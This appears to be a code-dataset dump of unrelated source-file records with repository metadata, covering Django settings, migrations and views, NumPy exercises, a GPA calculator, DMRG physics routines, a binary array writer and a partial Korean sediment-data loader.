'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"susanaledesmajimenez@gmail.com"
] | susanaledesmajimenez@gmail.com |
34a34b155ceef0b935c8c7b9fdbf54c84090c897 | 3d1fbb75a58db3eaa7a80e62ae75abf65a00a5cf | /exercices/w1/LA/orthogonal.test.py | 668c69e699e3ecc2d121e00c0d3b3f222c120790 | [] | no_license | opatiny/mobile-robotics | ff3051e1ae3272a58689fcafd136a722009536a6 | d59256a996d5772393c903c94c8e9c86cb945d60 | refs/heads/master | 2020-06-17T19:07:59.380226 | 2019-11-06T09:00:59 | 2019-11-06T09:00:59 | 196,018,976 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from orthogonal import isOrthogonal
matrix = [[1, 0], [0, 1]]
print("matrix")
isOrthogonal(matrix)
matrix1 = [[1, 2], [3, 4, 5]]
print("matrix1")
isOrthogonal(matrix1)
matrix2 = [[2/3, 1/3, 2/3], [-2/3, 2/3, 1/3], [1/3, 2/3, -2/3]]
print("matrix2")
isOrthogonal(matrix2)
matrix3 = [[2/3, 2/3, -1/3], [2/3, -1/3, 2/3], [-1/3, 2/3, 2/3]]
print("Exercise matrix: ")
isOrthogonal(matrix3)
| [
"oceane@octanis.ch"
] | oceane@octanis.ch |
9df0e4404a0a011ce5e1618eaf2bf3b31c0ad708 | 937d0b86d5a438338cbc5d4938c9109e9b0a51c4 | /web/project6/phonenet/phoneapp/migrations/0004_tool_toolimg.py | b53e7d1b24d4f7522331050332b0272f77f7ae46 | [] | no_license | z1459876808/web- | 40ebb1bca626f0ff3f81a19aa21baf3c378c46da | f42ce9f4b568da00ea815b1bc724d09f9e6c567c | refs/heads/master | 2022-11-21T23:30:06.069107 | 2020-07-20T03:49:49 | 2020-07-20T03:55:38 | 281,004,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | # Generated by Django 3.0.4 on 2020-03-11 02:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('phoneapp', '0003_label'),
]
operations = [
migrations.CreateModel(
name='Tool',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Toolimg',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=10)),
('img', models.ImageField(upload_to='toolimg')),
('title', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='toolimg', to='phoneapp.Tool', verbose_name='所属标题')),
],
),
]
| [
"1459876808@qq.com"
] | 1459876808@qq.com |
3a068e2a6864d85f641af5e0ebd662ca44331292 | 07a1088bcec25cdf7e4027abc5a8dc83eb37ffb4 | /fabrik/ext/nginx.py | ccc6e5e8f0774d418cd35226796dadcf056ebc96 | [
"MIT"
] | permissive | Frojd/Fabrik | 7e00bb66761c552da9d70cc36f3ff0108bf7a481 | 9f2edbba97a7fd236b72a9b3010f6e912ab5c001 | refs/heads/master | 2020-04-06T04:39:31.445843 | 2018-04-16T06:54:21 | 2018-04-16T06:54:21 | 25,035,502 | 12 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | # -*- coding: utf-8 -*-
"""
fabrik.ext.nginx
----------------------
Methods for handling nginx
"""
from fabric.state import env
def restart():
env.run("service nginx restart")
def reload():
env.run("nginx -s reload")
| [
"martin@marteinn.se"
] | martin@marteinn.se |
1c89e34f2a701a441c1be1d145087c705e02ff86 | f2171e2f2c78d616a381b3308d13a600d687587f | /x.Machine Learning Foundation/NumPy and Pandas Part 1/numpy_index_array.py | fce265f622df7db4d6f5e57be7428a2167fd3916 | [] | no_license | vinkrish/ml-jupyter-notebook | bda01343118869bd2bfb44f3c3122853834d314a | ef5d05512b8387d7a3e494f024416f6ca7336827 | refs/heads/master | 2021-06-09T00:53:51.638551 | 2021-05-08T15:13:51 | 2021-05-08T15:13:51 | 168,104,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,921 | py | import numpy as np
# Change False to True for each block of code to see what it does
# Using index arrays
if False:
a = np.array([1, 2, 3, 4])
b = np.array([True, True, False, False])
print a[b]
print a[np.array([True, False, True, False])]
# Creating the index array using vectorized operations
if False:
a = np.array([1, 2, 3, 2, 1])
b = (a >= 2)
print a[b]
print a[a >= 2]
# Creating the index array using vectorized operations on another array
if False:
a = np.array([1, 2, 3, 4, 5])
b = np.array([1, 2, 3, 2, 1])
print b == 2
print a[b == 2]
def mean_time_for_paid_students(time_spent, days_to_cancel):
'''
Fill in this function to calculate the mean time spent in the classroom
for students who stayed enrolled at least (greater than or equal to) 7 days.
Unlike in Lesson 1, you can assume that days_to_cancel will contain only
integers (there are no students who have not canceled yet).
The arguments are NumPy arrays. time_spent contains the amount of time spent
in the classroom for each student, and days_to_cancel contains the number
of days until each student cancel. The data is given in the same order
in both arrays.
'''
is_continued = days_to_cancel >= 7
paid_time = time_spent[is_continued]
return paid_time.mean()
# Time spent in the classroom in the first week for 20 students
time_spent = np.array([
12.89697233, 0. , 64.55043217, 0. ,
24.2315615 , 39.991625 , 0. , 0. ,
147.20683783, 0. , 0. , 0. ,
45.18261617, 157.60454283, 133.2434615 , 52.85000767,
0. , 54.9204785 , 26.78142417, 0.
])
# Days to cancel for 20 students
days_to_cancel = np.array([
4, 5, 37, 3, 12, 4, 35, 38, 5, 37, 3, 3, 68,
38, 98, 2, 249, 2, 127, 35
])
| [
"vinaykrishna1989@gmail.com"
] | vinaykrishna1989@gmail.com |
242f3d45299992e3784fe4a39f470b8f1c206bfb | 089030e3de35797990f34f2416a6f48f32c032fe | /3 Repetition/exercise68.py | ee33ea0522664216de275687886e8d0d990c391f | [] | no_license | nmoore32/Python-Workbook | ea26be6ed870c5f9497906717f3eaab5cac67571 | d3ed2b7191a14c3ded975915e7f9f2f9fa9da894 | refs/heads/master | 2021-06-14T05:54:38.988388 | 2020-04-09T20:49:42 | 2020-04-09T20:49:42 | 254,475,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | ##
# Computes GPA from a list of letter grades provided by user
#
A_PLUS = 4.0
A_MINUS = 3.7
B_PLUS = 3.3
B = 3.0
B_MINUS = 2.7
C_PLUS = 2.3
C = 2.0
C_MINUS = 1.7
D_PLUS = 1.3
D = 1.0
F = 0
# Track sum of grade points for letter grades entered and number of grades entered
sum = 0
count = 0
# Read the first letter grade from user
grade = input("Enter a letter grade (blank to quit): ")
# Read additional letter grades from user until they enter a blank line
while grade != "":
# Add the grade points for the letter grade to sum
if grade == "A+" or grade == "A":
sum += A_PLUS
elif grade == "A-":
sum += A_MINUS
elif grade == "B+":
sum += B_PLUS
elif grade == "B":
sum += B
elif grade == "B-":
sum += B_MINUS
elif grade == "C+":
sum += C_PLUS
elif grade == "C":
sum += C
elif grade == "D+":
sum += D_PLUS
elif grade == "D":
sum += D
# Increment the counter by one
count += 1
# Read the next letter grade
grade = input("Enter a letter grade (blank to quit): ")
# Calculate the average
gpa = sum / count
# Display the result
print(f"Your GPA is {gpa:.2f}.")
| [
"61410102+nmoore32@users.noreply.github.com"
] | 61410102+nmoore32@users.noreply.github.com |
1f4bd449aba35de17062609461614b820c3a18f9 | eddbf9518e7384f0e9a1d9e19cbe74855c3f24bd | /2017011066LiShaoFei/First.py | 7f3f5ef75bfa8561246cc72cba9cfb0ca45f5650 | [] | no_license | wanghan79/2019_Python | 9d2391d799efd9545b2afb3565bc5c6d542d1d86 | f856409af92af3990773966d937d58d9d1cade04 | refs/heads/master | 2020-05-05T12:54:30.921361 | 2019-07-20T09:50:03 | 2019-07-20T09:50:03 | 180,050,522 | 11 | 14 | null | 2019-07-15T15:00:03 | 2019-04-08T01:59:24 | Python | UTF-8 | Python | false | false | 1,119 | py | import numpy as np
import random
import string
def random_list( start, stop, length):
if length >= 0:
length = int(length)
start, stop = (int(start), int(stop)) if start <= stop else (int(stop), int(start))
random_list = []
for i in range(length):
random_list.append(random.randint(start, stop))
return random_list
class dataGenerate:
def dGen(self, size=100000):
for i in range(size):
keys = random_list(0, 100, 10)
values = random_list(0, 100, 10)
dictionary = dict(zip(keys, values))
numx = np.random.randint(0, 1000)
numy = np.random.randint(0, 1000)
salt = ''.join(random.sample(string.ascii_letters + string.digits, 8)) # Generate a random string
data = {'string': salt, 'intX': numx, 'intY': numy, 'float': np.random.uniform(0, 1000000), 'keys':keys, 'values':values}
yield data
if __name__ == '__main__':
f = open("output.txt", "w")
for i in dataGenerate().dGen():
s=str(i)
f.write(s+'\n')
f.close() | [
"noreply@github.com"
] | wanghan79.noreply@github.com |
bb645742770c7dbfb384b13d8c761bfa3995c6bf | 62671dc1036be231348f7e1c11d6873e0d5196cb | /env/bin/gunicorn_django | ef5b783723dffe83a8f3f7aced945ba28a5a109b | [] | no_license | BaranovAV/track.mail.ru-web1 | 4f877f901298942778e1bf34e94fc8018d2600aa | 12d6e31f6d2e06e5fa784dc15efe822f497790c4 | refs/heads/master | 2021-01-13T08:10:27.482908 | 2016-10-23T18:36:39 | 2016-10-23T18:36:39 | 71,719,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/andy/projects/projectDZ2/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.djangoapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"baranovab.1992@gmail.com"
] | baranovab.1992@gmail.com | |
7d69b0a585408e145f7c50fc555cfe9dfb7cb57f | 35cb7a8a22fdd3932b63c89b17f587205bd00fec | /apps/excursao/migrations/0002_excursao_is_internacional.py | 3f9637243e6f3af5d03ec7553d613c3b439ba4a1 | [] | no_license | rcoutelo/viajecomdarcy-web | debc24ec44e733c12257f3e89f3424ab7b3ee1f4 | 2ab2db407523299a58423f058c1f74231b15d617 | refs/heads/master | 2021-03-27T14:41:34.303463 | 2017-06-19T15:14:54 | 2017-06-19T15:14:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2017-05-19 19:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('excursao', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='excursao',
name='is_internacional',
field=models.BooleanField(default=False),
),
]
| [
"lfa.luisfelipe@gmail.com"
] | lfa.luisfelipe@gmail.com |
5dd3a0f3d2cdac072c394e17112b26004a06a66b | 29744a2707c0c4335f51ab4a764fb24dc3a1ab08 | /stockmgmgt/views.py | 10182b9860dbaa4d214a064e3505d113a543a791 | [] | no_license | cccivenv/src3 | 492e63131829602317ea067f094b45370eccb0c7 | 4678aa4959e2e7cf71cb3d64a7b237ca6739cbf7 | refs/heads/master | 2023-04-25T01:15:24.652299 | 2021-05-07T06:10:03 | 2021-05-07T06:10:03 | 365,546,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,314 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
import csv
from django.contrib import messages
#from .models import *
from .forms import *
#from .resources import StockResource
#from tablib import Dataset
# Create your views here.
def home(request):
title = 'Welcome: This is the Home Page'
form = "eveg"
context = {
"title": title,
"test": form,
}
return render(request, "home.html", context)
def list_items(request):
title = 'LIST OF ITEMS'
form = StockSearchForm(request.POST or None)
queryset = Stock.objects.all()
context = {
"title": title,
"queryset": queryset,
"form": form,
}
if request.method == 'POST':
queryset = Stock.objects.filter( # category__icontains=form['category'].value(),
item_name__icontains=form['item_name'].value()
)
if form['export_to_CSV'].value() == True:
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="List of stock.csv"'
writer = csv.writer(response)
writer.writerow(['CATEGORY', 'ITEM NAME', 'QUANTITY'])
instance = queryset
for stock in instance:
writer.writerow([stock.category, stock.item_name, stock.quantity])
return response
context = {
"form": form,
"title": title,
"queryset": queryset,
}
return render(request, "list_items.html", context)
def add_items(request):
form = StockCreateForm(request.POST or None)
if form.is_valid():
form.save()
messages.success(request, 'Successfully Saved')
return redirect("/list_items")
context = {
"form": form,
"title": "Add Item",
}
return render(request, "add_items.html", context)
def update_items(request, pk):
queryset = Stock.objects.get(id=pk)
form = StockUpdateForm(instance=queryset)
if request.method == 'POST':
form = StockUpdateForm(request.POST, instance=queryset)
if form.is_valid():
form.save()
messages.success(request, 'Successfully Saved')
return redirect('/list_items')
context = {
'form': form
}
return render(request, 'add_items.html', context)
def delete_items(request, pk):
queryset = Stock.objects.get(id=pk)
if request.method == 'POST':
queryset.delete()
messages.success(request, '刪除成功')
return redirect('/list_items')
return render(request, 'delete_items.html')
def stock_detail(request, pk):
queryset = Stock.objects.get(id=pk)
context = {
"title": queryset.item_name,
"queryset": queryset,
}
return render(request, "stock_detail.html", context)
def issue_items(request, pk):
queryset = Stock.objects.get(id=pk)
form = IssueForm(request.POST or None, instance=queryset)
if form.is_valid():
instance = form.save(commit=False)
instance.quantity -= instance.issue_quantity
instance.issue_by = str(request.user)
messages.success(request, "Issued SUCCESSFULLY. " + str(instance.quantity) + " " + str(instance.item_name) + "s now left in Store")
instance.save()
return redirect('/stock_detail/'+str(instance.id))
# return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": 'Issue ' + str(queryset.item_name),
"queryset": queryset,
"form": form,
"username": 'Issue By: ' + str(request.user),
}
return render(request, "add_items.html", context)
def receive_items(request, pk):
queryset = Stock.objects.get(id=pk)
form = ReceiveForm(request.POST or None, instance=queryset)
if form.is_valid():
instance = form.save(commit=False)
instance.quantity += instance.receive_quantity
instance.save()
messages.success(request, "Received SUCCESSFULLY. " + str(instance.quantity) + " " + str(instance.item_name)+"s now in Store")
return redirect('/stock_detail/'+str(instance.id))
# return HttpResponseRedirect(instance.get_absolute_url())
context = {
"title": 'Reaceive ' + str(queryset.item_name),
"instance": queryset,
"form": form,
"username": 'Receive By: ' + str(request.user),
}
return render(request, "add_items.html", context)
| [
"easy_waiting@hotmail.com"
] | easy_waiting@hotmail.com |
be2a6f284ba58d4734600586f30031795fb41b11 | e880764d19503274f1ea9d7185ed62333349c5b4 | /Some_thesis_calcs/gapcalc.py | 917e9d60e9e8beb2133d8ec2feb4eabd16ca3c27 | [] | no_license | AlfreBar/ergo-thesis | 03f90fcfd09140853bdc6be92ac4064fc855fc53 | be3ccebce65b97ed017173cf5ce43edddb62dbca | refs/heads/master | 2023-02-24T07:47:11.490870 | 2021-01-29T20:20:56 | 2021-01-29T20:20:56 | 331,362,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,920 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
from scipy.sparse import kron, identity
from scipy.sparse.linalg import eigsh # Lanczos routine from ARPACK
from matplotlib import pyplot as plt
# Definiamo degli oggetti BLOCK che hanno come attributi: lunghezza della catena di siti nel blocco, dimensione dello spazio di Hilbert del blocco, $H_B$ e $H_{BS}$
# In[2]:
from collections import namedtuple
Block = namedtuple("Block", ["length", "basis_size", "operator_dict"])
EnlargedBlock = namedtuple("EnlargedBlock", ["length", "basis_size", "operator_dict"])
# In[3]:
def is_valid_block(block):
for op in block.operator_dict.values():
if op.shape[0] != block.basis_size or op.shape[1] != block.basis_size:
return False
return True
is_valid_enlarged_block = is_valid_block
# In[4]:
model_d = 2 # single-site basis size
# In[6]:
def enlarge_block(block,site,H2):
dblock = block.basis_size
b = block.operator_dict
dsite = site.basis_size
s=site.operator_dict
enlarged_operator_dict = {
"H": kron(b["H"], identity(dsite)) + kron(identity(dblock), s["H"]) + H2(b["conn_Sx"], s["conn_Sx"]),
"conn_Sx": kron(identity(dblock), s["conn_Sx"])
}
return EnlargedBlock(length=(block.length + 1),
basis_size=(dblock * model_d),
operator_dict=enlarged_operator_dict)
# In[7]:
def rotate_and_truncate(operator, transformation_matrix):
"""Transforms the operator to the new (possibly truncated) basis given by
`transformation_matrix`.
"""
return transformation_matrix.conjugate().transpose().dot(operator.dot(transformation_matrix))
# Ora bisogna fare un DMRG step: Creare blocco allargato, connettere, superblocco, trovare lo stato di base e poi costruire matrice densità
# In[8]:
def get_superblock(sys_enl, env_enl, H2):
assert is_valid_enlarged_block(sys_enl)
assert is_valid_enlarged_block(env_enl)
# Construct the full superblock Hamiltonian.
m_sys_enl = sys_enl.basis_size
m_env_enl = env_enl.basis_size
sys_enl_op = sys_enl.operator_dict
env_enl_op = env_enl.operator_dict
superblock_hamiltonian= kron(sys_enl_op["H"], identity(m_env_enl)) + kron(identity(m_sys_enl), env_enl_op["H"]) + \
H2(sys_enl_op["conn_Sx"], env_enl_op["conn_Sx"])
return superblock_hamiltonian
# In[9]:
# Diagonalizziamo e otteniamo matrice densità
def get_reduced_density_matrix(enl,psi0):
# Construct the reduced density matrix of the system by tracing out the
# environment
# psi=psi_{ij}|i>|j>
# We want to make the (sys, env) indices correspond to (row, column) of a
# matrix, respectively. Since the environment (column) index updates most
# quickly in our Kronecker product structure, psi0 is thus row-major ("C style")
# esempio 3 siti
# 12345678-> 12 000 and 001
# 34 010 and 011
# 56 100 and 101
# 78 110 and 111
#-1 means to be inferred
psi0 = psi0.reshape([enl.basis_size, -1], order="C")
rho = np.dot(psi0, psi0.conjugate().transpose())
return rho
# In[14]:
def get_transformation_matrix(rho,m,enl):
# Diagonalize the reduced density matrix and sort the eigenvectors by
# eigenvalue.
evals, evecs = np.linalg.eigh(rho)
possible_eigenstates = []
for eval, evec in zip(evals, evecs.transpose()):
possible_eigenstates.append((eval, evec))
possible_eigenstates.sort(reverse=True, key=lambda x: x[0]) # largest eigenvalue first
# Build the transformation matrix from the `m` overall most significant
# eigenvectors.
my_m = min(len(possible_eigenstates), m)
transformation_matrix = np.zeros((enl.basis_size, my_m), dtype='d', order='F')
for i, (eval, evec) in enumerate(possible_eigenstates[:my_m]):
transformation_matrix[:, i] = evec
return transformation_matrix, my_m
# In[15]:
def DMRG_step(sys,site,env,m,H2):
sys_enl = enlarge_block(sys,site,H2)
env_enl = enlarge_block(env,site,H2)
superblock=get_superblock(sys_enl,env_enl,H2)
energies, psis = eigsh(superblock, k=2, which="SA")
energy=energies[0]
energy1=energies[1]
psi0=psis[:,0]
psi1=psis[:,1]
rho=get_reduced_density_matrix(sys_enl,psi0)
rho1=get_reduced_density_matrix(sys_enl,psi1)
transformation_matrix, my_m =get_transformation_matrix(rho,m,sys_enl)
#truncation_error = 1 - sum([x[0] for x in possible_eigenstates[:my_m]])
#print("truncation error:", truncation_error)
# Rotate and truncate each operator.
new_operator_dict = {}
for name, op in sys_enl.operator_dict.items():
new_operator_dict[name] = rotate_and_truncate(op, transformation_matrix)
new_env_operator_dict = {}
for name, op in env_enl.operator_dict.items():
new_env_operator_dict[name] = rotate_and_truncate(op, transformation_matrix)
newblock = Block(length=sys_enl.length,
basis_size=my_m,
operator_dict=new_operator_dict)
newenv = Block(length=env_enl.length,
basis_size=my_m,
operator_dict=new_env_operator_dict)
return newblock,energy,energy1
# In[16]:
def infinite_system_algorithm(block,site, L, m,H2):
# Repeatedly enlarge the system by performing a single DMRG step, using a
# reflection of the current block as the environment.
while 2 * block.length < L:
#print("L =", block.length * 2 + 2)
block, energy ,energy1 = DMRG_step(block, site ,block, m,H2)
#print("E/L =", energy / (block.length * 2))
return energy1-energy
#%%
#fblock,fenergy,frho=infinite_system_algorithm(site,site,100,20,H2) | [
"57600721+Aleph093@users.noreply.github.com"
] | 57600721+Aleph093@users.noreply.github.com |
feddb7fea48b3868a79ca54108ca2c680f061a2e | 5a97652f9a0a6b46bc1e50342e8d2652e224e0d6 | /apps/courses/models.py | ff6a5e42860d5cea76a7239d03a20c4baad5e3aa | [] | no_license | dacer250/LxOnline | 5d22ad56bd9c48e21664f095348bd246b60cd49b | e58ab7ec14c877e5c176894d49522e11cd3efc87 | refs/heads/master | 2021-06-13T01:31:13.883126 | 2017-03-03T12:45:26 | 2017-03-03T12:45:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,502 | py | # encoding:utf-8
from __future__ import unicode_literals
from __future__ import absolute_import
from django.db import models
from apps.organization.models import CourseOrg, Teacher
# Create your models here.
class Course(models.Model):
organization = models.ForeignKey(CourseOrg, verbose_name=u'所属机构')
teacher = models.ForeignKey(Teacher, null=True, blank=True, verbose_name=u'授课讲师')
name = models.CharField(max_length=50, verbose_name=u'课程名')
desc = models.CharField(max_length=300, verbose_name=u'描述')
detail = models.TextField(verbose_name=u'详情')
category = models.CharField(max_length=20, default=u'开发', verbose_name=u'种类')
tag = models.CharField(max_length=20, default='', verbose_name=u'标签')
degree = models.CharField(max_length=2, verbose_name=u'等级',
choices=(('cj', u'初级'), ('zj', u'中级'), ('gj', u'高级')))
image = models.ImageField(max_length=100, upload_to='course/image/%Y/%m', verbose_name=u'封面')
learn_time = models.IntegerField(default=0, verbose_name=u'学习时长(分钟)')
student_num = models.IntegerField(default=0, verbose_name=u'学习人数')
fav_num = models.IntegerField(default=0, verbose_name=u'收藏人数')
click_num = models.IntegerField(default=0, verbose_name=u'点击数')
need_kown = models.CharField(max_length=1000, default='', verbose_name=u'课程需知')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'课程'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
def get_chapte_num(self):
return self.chapter_set.all().count()
def get_chaptes(self):
return self.chapter_set.all()
def get_learn_users(self):
return self.usercourse_set.all()[:5]
class Chapter(models.Model):
course = models.ForeignKey(Course, verbose_name=u'课程')
name = models.CharField(max_length=50, verbose_name=u'章节名')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'章节'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
def get_vedios(self):
return self.video_set.all()
class Video(models.Model):
name = models.CharField(max_length=50, verbose_name=u'视频名')
url = models.CharField(max_length=100, default='', verbose_name=u'访问地址')
learn_time = models.IntegerField(default=0, verbose_name=u'学习时长(分钟)')
chapter = models.ForeignKey(Chapter, verbose_name=u'章节')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'视频'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
class CourseResource(models.Model):
course = models.ForeignKey(Course, verbose_name=u'课程')
name = models.CharField(max_length=50, verbose_name=u'资源名')
download_url = models.FileField(max_length=100, upload_to='course/resource/%Y/%m',
verbose_name=u'资源文件')
create_time = models.DateTimeField(auto_now_add=True, verbose_name=u'添加时间')
class Meta:
verbose_name = u'课程资源'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
| [
"651069858@qq.com"
] | 651069858@qq.com |
71913bb773b5410e899a35199682df594f695585 | 0497a6960fc2dab8d9e32d0d22a07676be1601a2 | /Methods and Functions/returnEven.py | 822a5621bd84fc4a666a1eddba0b1d244d746032 | [] | no_license | SaashaJoshi/Python | 114ff90e620ab1b95246ed584657d65e2e32213d | ff1083459aa4307d4460446ab2305ffb6217db65 | refs/heads/master | 2021-06-03T02:27:18.248834 | 2020-08-19T17:10:06 | 2020-08-19T17:10:06 | 141,785,153 | 1 | 7 | null | 2018-10-31T15:46:55 | 2018-07-21T05:51:31 | Python | UTF-8 | Python | false | false | 202 | py | def rEven(*args): #function takes arbitrary number of arguments
list=[]
for item in args:
if item%2==0:
list.append(item) #append even items to the empty list
print(list)
| [
"noreply@github.com"
] | SaashaJoshi.noreply@github.com |
7098e59a33ee69db9bf67850ed6b164b8ca3a140 | 164a02b8376df3a7a0c5ef4db7966b41205313b9 | /NSAF/newNsaf.py | b7c56f862e3e0b939fb52ca5f8f7e6bc2753d61b | [
"MIT"
] | permissive | ezPsycho/NSAF.py | 6c83e87ac6f350749b4270d3304006d782721ee2 | afb9c38ebf2576c136ea0a01b293d722a4398b1e | refs/heads/master | 2020-04-15T01:22:36.596541 | 2019-01-09T13:08:51 | 2019-01-09T13:08:51 | 164,273,757 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | import os
import struct
from . import DTYPE_FORMATS, DTYPE_MARKS
def newNsaf(x, path, dtype = 'uint16', offset = (0,0,0)):
assert dtype in DTYPE_MARKS, '`dtype` should be one of `uint16`, `uint32`, `float32`, `float64`.'
assert len(x.shape) == 3, '`x` must be a 3d array.'
assert os.access(os.path.dirname(path), os.W_OK), 'The path is not writable.'
dtype_mark = DTYPE_MARKS[dtype]
dtype_format = DTYPE_FORMATS[dtype]
with open(path, 'wb') as f:
f.write(struct.pack('>H', dtype_mark))
for _dim in x.shape:
f.write(struct.pack('>H', _dim))
for _dim in offset:
f.write(struct.pack('>H', _dim))
for _ in range(3):
f.write(struct.pack('>H', 0))
list(map(
lambda x: f.write(struct.pack(dtype_format, x)),
x.flatten()
))
| [
"losses.don@gmail.com"
] | losses.don@gmail.com |
eff50a322a4758966d3454ce3b8bb8562467e91e | 7a36834432332e4cbe528cb8607949c783a834c0 | /user/migrations/0007_remove_cart_quality.py | 9de5df1b5650930def57c8a0410dcb79eb3690e7 | [] | no_license | phamdat16041999/hai_phong | 6e52c04d4f0dc24300fc039c01c127c55a5b4904 | c6f21734111f558a37645112fd20eb380b075e7e | refs/heads/main | 2023-05-03T15:24:15.559540 | 2021-05-21T13:21:16 | 2021-05-21T13:21:16 | 346,765,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | # Generated by Django 3.1.4 on 2021-03-17 03:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user', '0006_cart_quality'),
]
operations = [
migrations.RemoveField(
model_name='cart',
name='Quality',
),
]
| [
"56620800+phamdat16041999@users.noreply.github.com"
] | 56620800+phamdat16041999@users.noreply.github.com |
bdc88b26d53866749059d77cebd4536b11044064 | 874b03a2f96bd6ebdfa21b61d6c4a703ea4d3032 | /read_korean_data.py | d8cf78e2989ce99640d8dfe8036ed815467aa578 | [] | no_license | chunyaoyang/dissertation | b026c53eee38ca4c071d454fdd279a4a9a8fdca7 | 21768336b6913629235a8cd0e40f1205b511509f | refs/heads/master | 2020-04-23T18:11:05.174417 | 2019-02-18T21:48:26 | 2019-02-18T21:48:26 | 171,357,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,566 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 18 14:44:33 2019
@author: cyyang
"""
import os
import pandas as pd
import numpy as np
def findExcelFiles():
"""Load all excel files in folders"""
pathes = []
for root, dirs, files in os.walk("."):
for file in files:
if file.endswith(".xlsx"):
if file.startswith("Sediment"):
pathes.append(root + "/" + file)
return pathes
def read_sediment_measurement(f_path):
raw_df = pd.read_excel(f_path,sheet_name='sediment measurement',skiprows=4,usecols=[5,11,20,21,23,26])
raw_df.columns = ['Date', 'Q', 'C', 'Qs', 'Qt', 'ds']
raw_df.Date = raw_df.Date.astype(str)
raw_df.Date = pd.to_datetime(raw_df.Date.str[:10])
return raw_df
def read_dischargeTimeSeries(f_path):
df_raw = pd.read_excel(f_path, sheet_name='stage-discharge(daily)',skiprows=3,thousands=',')
df_raw = df_raw.drop(df_raw.columns[[0,2,5,8,11,14,17,20,23,26,29]], axis=1)
df = df_raw.apply(pd.to_numeric, errors='coerce')
df2 = df[df.columns[1]].append(df[df.columns[3]]).append(df[df.columns[5]]).append(df[df.columns[7]]).append(df[df.columns[9]]).append(df[df.columns[11]]).append(df[df.columns[13]]).append(df[df.columns[15]]).append(df[df.columns[17]]).append(df[df.columns[19]]).reset_index(drop=True)
Q = np.array(df2)
df1 = df_raw[df_raw.columns[0]].append(df_raw[df_raw.columns[2]]).append(df_raw[df_raw.columns[4]]).append(df_raw[df_raw.columns[6]]).append(df_raw[df_raw.columns[8]]).append(df_raw[df_raw.columns[10]]).append(df_raw[df_raw.columns[12]]).append(df_raw[df_raw.columns[14]]).append(df_raw[df_raw.columns[16]]).append(df_raw[df_raw.columns[18]]).reset_index(drop=True)
date = np.array(df1)
df = pd.DataFrame()
df['date'] = date
df['Q'] = Q
df = df.dropna(subset=['date'])
return df
def load_attribute():
elev = pd.read_csv('./data/elev.csv', header=0, usecols=[2,9,10,11], names=['Name', 'Elev',"MAX_Elev", 'Precip'])
df1 = pd.read_excel('./data/Sediment Yield Field Data set_1 (Han River Watershed)/Data_set-Han_18May2016.xlsx',
sheet_name='Han R.(H1~H4)',header=0,usecols=[3,4,5,6])
df2 = pd.read_excel('./data/Sediment Yield Field Data set_1 (Han River Watershed)/Data_set-Han_18May2016.xlsx',
sheet_name='Han R.(H5~H7)',header=0,usecols=[3,4,5])
df3 = pd.read_excel('./data/Sediment Yield Field Data set_2 (Nakdong River Watershed)/Data_set-Nakdong_18May2016.xlsx',
sheet_name='Nakdong R.(N1~N5)',header=0,usecols=[3,4,5,6,7])
df4 = pd.read_excel('./data/Sediment Yield Field Data set_2 (Nakdong River Watershed)/Data_set-Nakdong_18May2016.xlsx',
sheet_name='Nakdong R.(N6~N10)',header=0,usecols=[3,4,5,6,7])
df5 = pd.read_excel('./data/Sediment Yield Field Data set_2 (Nakdong River Watershed)/Data_set-Nakdong_18May2016.xlsx',
